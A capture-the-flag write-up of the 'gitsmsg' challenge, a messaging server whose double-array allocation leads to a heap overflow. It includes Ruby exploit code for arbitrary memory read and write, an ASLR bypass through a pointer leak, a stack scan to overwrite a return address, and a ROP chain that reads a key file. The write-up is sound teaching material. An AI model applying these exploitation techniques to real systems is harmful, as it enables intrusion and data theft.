"It's Saturday night; I have no date, a 2L bottle of Shasta, and my all-rush mix tape. Let's rock!"

...that's what I said before I started gitsmsg. I then entered "Rush" into Pandora, and listened to a mix of Rush, Kansas, Queen, Billy Idol, and other 80's rock for the entire level. True story.

Anyway, let's get on with it! Not too long ago I posted my writeup for the 100-level "Pwnage" challenge from Ghost in the Shellcode. Now, it's time to get a little more advanced and talk about the 299-level challenge: gitsmsg. Solved by only 11 teams, this was considerably more challenging.

As before, you can obtain the binary, my annotated IDA database, and exploit code on my Github page



Overview

I'll start right out by saying: gits was a huge timesink, for me. It was a Linux-based 32-bit application, which was nice, but the codebase was biiiiig and scary, it took a long time to reverse it, and then possibly even longer to get the exploit working. I'll explain the bumps I hit as I go through this.

The summary is, it's a messaging server. You log in, queue/view/modify/delete messages for other users, send those messages, and read your own. The messages are stored in a heap-based linked list, and one type of message was vulnerable to a heap-based overflow. To make things difficult, the system implemented address-space layout randomization (ASLR) and data execution prevention (DEP), which had to be bypassed, as well as having read-only relocations (RELRO)enabled, which marks its imports as read-only once they've been set up by the dynamic linker.

So, a heap overflow on a system with all modern protections. Sounds like a challenge!

This time, I'm not going to spend any time on the assembly or reversing portions, there's just too much. I'll describe the protocol, the vulnerability, and the exploit. My IDA file—available from the Github link above—is heavily annotated, so feel free to peruse it! And if you're going to debug it, make sure you disable fork()/alarm() as I described in my last post!

The protocol

As I mentioned before, this is a messaging server. It supports eight different payload types, numbered 0x10 to 0x17, which can be used in nine different message types, numbered 0x01 to 0x09. Just for fun, here are my scratch notes I wrote while working on it.

Payload types

The following payloads are defined:

0x10 :: a byte (uint8)

0x11 :: an integer (uint32)

0x12 :: a double (uint64)

0x13 :: an array of bytes (uint8[])

0x14 :: an array of integers (uint32[])

0x15 :: an array of doubles (uint64[])

0x16 :: a static null-terminated string (there are 4 or 5 possible choices, indexed with a byte value)

It's possible that the types I called double might actually be intended as 64-bit integers, but ultimately it doesn't matter.

No message can be longer than 0x400 bytes, total. Which means an array of doubles can't be longer than 0x80 elements (0x80 elements * 8 bytes/element = 0x400 bytes).

Message types

These payload types can be used in any of the 9 message types:

0x01 :: login :: must be sent initially, also retrieves your messages

0x02 :: delete_queued_message :: unlinks a message from a linked list

0x03 :: retrieve_my_messages :: retrieve a list of the queued messages I've sent

0x04 :: store_message :: saves a message into a linked list of queued messages

0x05 :: get_stored_message :: retrieves and displays a message from a linked list

0x06 :: do_weird_math :: loops through the messages and does some kind of math that I didn't dig into

0x07 :: send_queued_messages :: writes all your messages to the filesystem under the recipient's username; he'll get them when he logs in

0x08 :: edit_queued_message :: edit a queued message

0x09 :: quit

Message struct

The messages are all stored in a struct that looks like:

(uint32) unknown

(uint32) message_type

(uint32) message-specific payload (see below)

(uint32) message-specific payload (part 2)

(char[256]) from_username

(char[256]) to_username

(char[240]) filename

(char[272]) unknown/unused

(void*) next_message

Basically, a linked list. The most interesting field is "message-specific payload", which contains different data depending on the message_type (I'm guessing it's implemented as a union in the original program).

For the simple datatypes (byte/int32/double), the message-specific payload is simply the 8-, 32-, or 64-bit value, stored across the pair of message-specific payload values.

For the array types (byte array/int32 array/double array), the first message-specific payload value is a 32-bit pointer to some freshly allocated memory, and the second is the length of said memory (this pair will be very important later, when we read/write arbitrary memory!).

Finally, for the static string type, it's a pointer to one of several static strings that are hardcoded into the binary (this value will be useful later when we want to bypass ASLR).

Later on, there's a field I called 'unknown/unused'; I suspect that it's simply designed to make the struct bigger than a single message can possibly be—0x400 bytes—to prevent overwriting the 'next_message' pointer. But that's purely an unvalidated guess, especially since there are easier and better ways to get an arbitrary memory write (as I'll explain later).

The vulnerability

I actually found this issue quite by accident. I was implementing the store/get protocol, and I kept getting mysterious SIG_ABRT messages. I plugged in a debugger and found that it was crashing in malloc(). Sweet! Sounds like a heap overflow!

I narrowed it down by simply adding/removing messages of the different types, until I discovered that message type 0x15—DOUBLE_ARRAY—was the culprit.

I took a look at the code that saves the double arrays to memory and immediately noticed this:

.text : B7FFD897 mov eax , dword ptr [ esp + 3 Ch + local_length ] .text : B7FFD89B lea esi , [ eax * 8 +0] .text : B7FFD8A2 cmp esi , 3 FFh .text : B7FFD8A8 mov [ ebp + message .length _for_certain_types ], eax .text : B7FFD8AB ja return_send_1005 .text : B7FFD8B1 mov [ esp + 3 Ch + out_arg_0 ], eax .text : B7FFD8B4 call _malloc .text : B7FFD8B9 test eax , eax .text : B7FFD8BB jnz short receive_esi_bytes_into_eax .text : B7FFD8BD lea esi , [ esi +0] .text : B7FFD8C0 jmp return_send_1005

It's multiplying the array size by 8, but not the malloc'd size! That means it'll always try to copy 8x too much data into the array!

Now, what can we do with this?

Reading and writing arbitrary memory

It's important to remember the structure of array-containing messages to understand how to read memory. In particular, this structure:

(uint32) unknown

(uint32) message_type

(uint32) message-specific payload (pointer)

(uint32) message-specific payload (length)

...

Let's say we allocate an array of ten doubles using the following code (you can find these functions defined in my exploit code on Github):

1 s = TCPSocket .new( " 192.168.1.119 " , 8585 ) 2 3 receive_code(s, 0x00001000 , " init " ) 4 5 login(s) 6 7 store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x4141414141414141 ] * 10 ) 8 result = get(s, 0 ) 9 10 Hex .print(result)

Everything will be normal and it'll output:

0000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0010 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA

Great! Now let's allocate a int32 array, right after the double array:

... 1 store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x4141414141414141 ] * 10 ) 2 store(s, VARDATA_TYPE_INT_ARRAY , [ 0x42424242 ] * 2 ) 3 Hex .print(get(s, 1 )) 4 Hex .print(get(s, 0 ))

We get this output:

2 0000 41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00 AAAAAAAAAAAA.... 3 0010 01 00 00 00 14 00 00 00 48 28 00 B8 02 00 00 00 ........H(...... 4 0020 41 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 AAAAAAAAAA.AAAAA 5 0030 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 6 0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 7 Length: 0x50 ( 80 ) 8 0000 42 42 42 42 42 42 42 42 BBBBBBBB 9 Length: 0x8 ( 8 )

Woah, what's going on here!?

What we're actually seeing is the first 0x0c (12) bytes of the double array that we created, printing out as normal (a bunch of 'A's), followed by the Heap header of the next message! The first array thinks it has 80 bytes to itself, and uses/displays all of them, when in reality it only actually has about 12 bytes (we only allocated 8 bytes, but rounding happens). The remaining 68 bytes are still in the heap's pool, and are completely fair game to be allocted. Then, when the second array is allocated, it takes up those bytes.

In other words, we have memory that looks like this:

------------------------------------------------------------------------------------------------------ | Unallocated.......... | ------------------------------------------------------------------------------------------------------ | [empty memory] | ------------------------------------------------------------------------------------------------------

The first array is stored in allocated memory. First, the message metadata (the type, message-specific data, to, from, filename, next message) is allocated. We'll ignore that for now. More importantly, the data buffer is allocated, and it's allocated too short!

Then array requests 8 bytes to store all its data, and gets 12 bytes (because rounding or whatever):

------------------------------------------------------------------------------------------------------ | array1 | Unallocated.......... | ------------------------------------------------------------------------------------------------------ | [empty memory] | ------------------------------------------------------------------------------------------------------

The first array thinks it has 80 bytes, and fills it all up

------------------------------------------------------------------------------------------------------ | array1 | Unallocated.......... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ------------------------------------------------------------------------------------------------------

Then along comes array2. Two chunks of memory are allocated for it, as well. The message metadata is allocated first, then a buffer for the message data is allocated. Because the metadata is allocated first, it ends up right after array1, and immediately populates the heap header:

------------------------------------------------------------------------------------------------------ | array1 | array2 metadata...... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ------------------------------------------------------------------------------------------------------

Then message2 populates its various values, including the type (0x14 = INT_ARRAY), message-specific data (pointer to buffer = 0xb8002848, and length = 0x00000002), and from_username (which, kind of confusingly, I set to all 'A's). In the end, the entire rest of array1 is overwritten:

------------------------------------------------------------------------------------------------------ | array1 | array2 metadata...... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00\x48\x28\x00\xb8\x02\x00\x00\x00AAAAAAAAAAAAAAAAAAAAA...| ------------------------------------------------------------------------------------------------------

Then, when we displayed it, we saw exactly that.

The most interesting part of this is the message-specific data at bytes 0x18 - 0x20 of array2: 0xb8002848 and 0x00000002. They are part of the second array's metadata, and are located right smack in the middle of where the first array thinks its data is! And since the first array thinks the memory belongs to it, we can read/write it via the first array. To put it another way, when array1 thinks it's editing its own value, it's actually editing array2's metadata.

What happens if I now edit the first array (the value here, 0xB7FFEC04, is a place where I happen know I'll find a static string in memory)?

edit(s, 1 , 3 , [ 0xB7FFEC04 , 10 ].pack( " II " ))

Then read the second?

Hex .print(get(s, 0 ))

It's going to dump out whatever happened to be in memory! It's truncated to the length I set (10 bytes) multiplied by the element size (and INT_ARRAY has 4-byte elements) for a total length of 40 bytes:

1 Length: 0x8 ( 8 ) 2 0000 2F 68 6F 6D 65 2F 67 69 74 73 6D 73 67 2F 6D 73 / home /gi tsmsg/ms 3 0010 67 73 2F 25 73 2F 25 30 38 78 25 30 38 78 00 00 gs/ %s /%08x%08x.. 4 0020 55 6E 62 72 65 61 6B 61 Unbreaka

Going back to the memory layout we looked at before, we saw that the message-specific data (the pointer and the length) overwrote array1:

------------------------------------------------------------------------------------------------------ | array1 | array2 metadata...... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00 \x48\x28\x00\xb8\x02\x00\x00\x00 AAAAAAAAAAAAAAAAAAAAA...| ------------------------------------------------------------------------------------------------------

But we modified array1 to change those values:

------------------------------------------------------------------------------------------------------ | array1 | array2 metadata...... | ------------------------------------------------------------------------------------------------------ |AAAAAAAAAAAA\x19\x04\x00\x00\x01\x00\x00\x00 \x04\xec\xff\xb7\x0a\x00\x00\x00 AAAAAAAAAAAAAAAAAAAAA...| ------------------------------------------------------------------------------------------------------

And therefore, when array2 thought it was reading from its own buffer, it was actually reading from the wrong location - 0xB7FFEC04.

(If we use the edit() function on array2, we can write to that memory as well.)

The summary is, we can read and write arbitrary memory, by allocating two arrays, using the first to modify the second's metadata, then reading or writing the second's data.

Still with me? I hope so!

Bypassing ASLR

For those of you who don't know what ASLR is, I recommend reading the Wikipedia page. The summary is, it means that modules and stack don't load to the same address twice. So, even though I have an arbitrary read/write memory attack, I don't know where memory is, in theory.

So how do we find it?

The first thing to realize is that the size of the binary in memory doesn't change, and the parts within the binary don't get re-arranged, so if we can determine where anything in the binary gets loaded, we can use clever math to figure out where everything gets loaded. We just have to leak a single address.

How do we leak a single address? It turns out, with the read-memory attack we just saw, this is rather easy. We allocate a double array, as usual, which will get overwritten by the next allocation:

1 store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x4141414141414141 ] * 10 )

Then we allocate a static string, which will overwrite the latter part of the double array:

1 store(s, VARDATA_TYPE_STRING , 0 )

As I've mentioned before, the strings are indexes into a hardcoded list of strings. Therefore, the address of a static string in the binary will be saved in the message-specific data.

Now, if we print out the double array:

1 Hex .print(get(s, 1 ))

We get the address of the first such string:

1 0000 41 41 41 41 41 41 41 41 41 41 41 41 19 04 00 00 AAAAAAAAAAAA .... 2 0010 01 00 00 00 16 00 00 00 B0 EB FF B7 00 00 00 00 ................ 3 ...

which is 0xb7ffebb0, in this case. I know—from the disassembled code—that this value is always 0x2bb0 bytes from the start of the binary, so I can calculate that the base address is 0xb7ffebb0 - 0x2bb0, or at address 0xb7ffc000 on this particular execution. From now on, I can base every address on that.

And thus, ASLR has been bypassed for the binary. But not, sadly, for the stack. I couldn't find any way to leak a useful stack address.

Controlling EIP

Up till now, every writeup I've read has taken essentially the same steps, although they don't go through them in as much detail as me (I love writing :) ). However, this is where paths diverge, and no two people have taken the same one.

The most obvious solution to controlling EIP is to overwrite the global offset table, which is the same as the solution to TI-1337. But, after a lot of mysterious crashing and debugging, I found out what RELRO means: it means that the relocations are re-mapped as read-only after they are filled in. The .dtor section (destructors) are likewise mapped as read-only. Crap!

I spent a long, long time trying to figure out what to overwrite. Can I cause path traversal? Can anything in the .data section cause an overflow? Can I read a stack address from anywhere in known memory? etc. etc., but no dice.

Eventually, I realized that I could read large chunks of memory, so why don't I read the entire space where the stack might be? Experimentally, I determined that, at least on my system, the stack was always between 0xBF800000 and 0xBFFFFFFF. With that in mind, I wrote this beast:

1 2 3 4 5 6 def find_return_address (s, base_addr) 7 address_to_find = [base_addr + MAIN_RETURN_ADDRESS ].pack( " I " ) 8 9 10 store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x5e5e5e5e5e5e5e5e ] * 4 ) 11 12 13 14 store(s, VARDATA_TYPE_BYTE_ARRAY , [ 0x41 ]) 15 16 17 18 edit(s, 1 , 3 , [ STACK_MIN , ( STACK_MAX - STACK_MIN )].pack( " II " )) 19 puts( " Reading the stack (0x%08x - 0x%08x)... " % [ STACK_MIN , STACK_MAX ]) 20 21 22 23 out = [ MESSAGE_GET , 0 ].pack( " II " ) 24 s.write(out) 25 get_int(s) 26 len = get_int(s) 27 result = "" 28 29 30 while (result.length < len) 31 result = result + s.recv( STACK_MAX - STACK_MIN + 1 ) 32 33 34 if (loc = result.index(address_to_find)) 35 return STACK_MIN + loc 36 end 37 end 38 39 40 puts( " Couldn't find the return address :( " ) 41 exit 42 end

It uses the exact same technique as we initially used to read that static string from memory, except instead of reading 20 or 30 bytes, it reads 0x7fffff—that's about 8 megabytes.

Somewhere in that chunk of memory will be the actual stack. And somewhere on the stack will be the return address of the main looping function. And, fortunately, because I can capture the base address of the binary (outlined last section), I know exactly what that address will be!

To put it another way: I know that the main loop returns to an address when it's done. I can calculate that address, and therefore I know the absolute return address of the main loop. If I know it, it means I can find it on the stack. And if I can find it on the stack, it means I can change it.

Here's some code that finds the address and changes it:

1 2 s = TCPSocket .new( " 192.168.1.119 " , 8585 ) 3 receive_code(s, 0x00001000 , " init " ) 4 login(s) 5 6 7 base_addr = get_base_address(s) 8 9 10 return_address = find_return_address(s, base_addr) 11 12 13 14 store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x4141414141414141 ] * 10 ) 15 store(s, VARDATA_TYPE_INT_ARRAY , [ 0x42424242 ]) 16 edit(s, 1 , 3 , [return_address, 1 ].pack( " II " )) 17 edit(s, 0 , 0 , [ 0x43434343 ].pack( " I " )) 18 19 20 quit(s)

Can you guess what happens to the server?

Program received signal SIGSEGV , Segmentation fault. 0x43434343 in ?? ()

Yup, EIP control.

To summarize: reading the entire stack is hacky, and I doubt it will work on a 64-bit system, but it worked great in this case!

Aside: Stashing data

It's really easy to stash data and get the address back. I'm going to want to open and read a file, later, so I need a way to stash the file and reference it later. This documented code should explain everything:

def stash_data (s, data) store(s, VARDATA_TYPE_DOUBLE_ARRAY , [ 0x5e5e5e5e5e5e5e5e ] * 4 ) store(s, VARDATA_TYPE_BYTE_ARRAY , data.bytes.to_a) result = get(s, 1 )[ 24 .. 27 ].unpack( " I " ).pop puts( " '%s' stored at 0x%08x " % [data, result]) return result end

Getting execution

So, I got this all working, and immediately stashed some simple shellcode and jumped to it. And it crashed. That means that data execution prevention—DEP—is enabled, so I can only execute code from +x sections of memory. I know how to do that fairly easily, but it was a kick in the face after all that work. Just make this easy on me, guys! :)

This isn't going to teach you how to write a ROP payload (one of my past CTF blogs will teach you in great detail!). But let me tell you: once you do this a couple times, it actually gets really easy!

Another aside: helpful hint on testing your exploit

Super helpful hint: the first thing I did after realizing that DEP was enabled was jump to base_addr+0x2350, which looks like this:

.text : B7FFE350 .text : B7FFE350 handle_packet_00000009_quit : .text : B7FFE350 .text : B7FFE350 mov [ esp + 2 Ch + out_arg_0 ], 1003 h .text : B7FFE357 call send_int .text : B7FFE35C .text : B7FFE35C loc_B7FFE35C : .text : B7FFE35C add esp , 20 h .text : B7FFE35F xor eax , eax .text : B7FFE361 pop ebx .text : B7FFE362 pop esi .text : B7FFE363 pop edi .text : B7FFE364 retn

It sends out the integer 0x1003, then attempts to return (and probably crashes). But getting that 0x1003 back from the socket after writing this was exactly the push I needed to keep going: I knew my EIP-control was working. Besides returning into known-good code like that, the shellcode eb fe (jmp -2) and cd 03 (debug breakpoint) are fantastic ways to debug exploits. The former never returns, and the latter crashes immediately (and gives you debug control if it's local). It's the perfect way to test if your code is actually being run!

Back to our originally scheduled program...

All right, let's look at our ROP chain!

def get_rop (file_path, base_addr, fd) stack = [ base_addr + OPEN , base_addr + PPR , file_path, 0 , base_addr + READ , base_addr + PPPR , 0 , file_path, 100 , base_addr + WRITE , base_addr + PPPR , fd, file_path, 100 , ] return stack end

Once again, this is fairly simple!

We open a file. The file_path is something we stashed earlier, and is "/home/gitsmsg/key". We return to a pop/pop/ret to clean the two arguments off the stack.

We read up to 100 bytes from the file into the place where we stashed the filename (since it's handy and writeable). We use the file handle 0, because that's the handle that's always used (all the handles are closed in the child process, and the syscall promises to use the lowest un-used handle). Hardcoding the file handle was ugly, but way easier than actually figuring it out.

We write up to 100 bytes from that buffer back to the main file descriptor of the connection—that is, back to the socket that I'm communicating through. This descriptor was obtained by reading the right place in memory.

It's simple, but it works! And if all goes according to plan, here's the exploit running:

$ ruby sploit .rb ** Initializing ** Logging in ** Stashing a path to the file on the heap '/ home / gitsmsg / key ' stored at 0xb8c2f848 ** Using a memory leak to get the base address [ ASLR Bypass ] ... found it @ 0xb77dd000 ** Reading the file descriptor from memory ... it ' s 4 ** Searching stack memory for the return address [ Another ASLR Bypass ] Reading the stack ( 0xbf800000 - 0xbfffffff )... ... found it @ 0xbfd0546c ** Generating the ROP chain [ DEP Bypass ] ** Writing the ROP chain to the stack ** Sending a ' quit ' message , to trigger the payload ** Crossing our fingers and waiting for the password The key is : lol , tagged unions for the WIN

w00t! Full exploit is here.

Conclusion

For those of you who are counting, this is a heap overflow with ASLR, DEP, stack cookies, RELRO, and safe heap unlinking. We bypass some of those, and just ignore others that don't apply, to run arbitrary code 100% reliably. I'm proud to say, it's the most difficult exploit I've ever written, and I'm thrilled I could share it with everybody!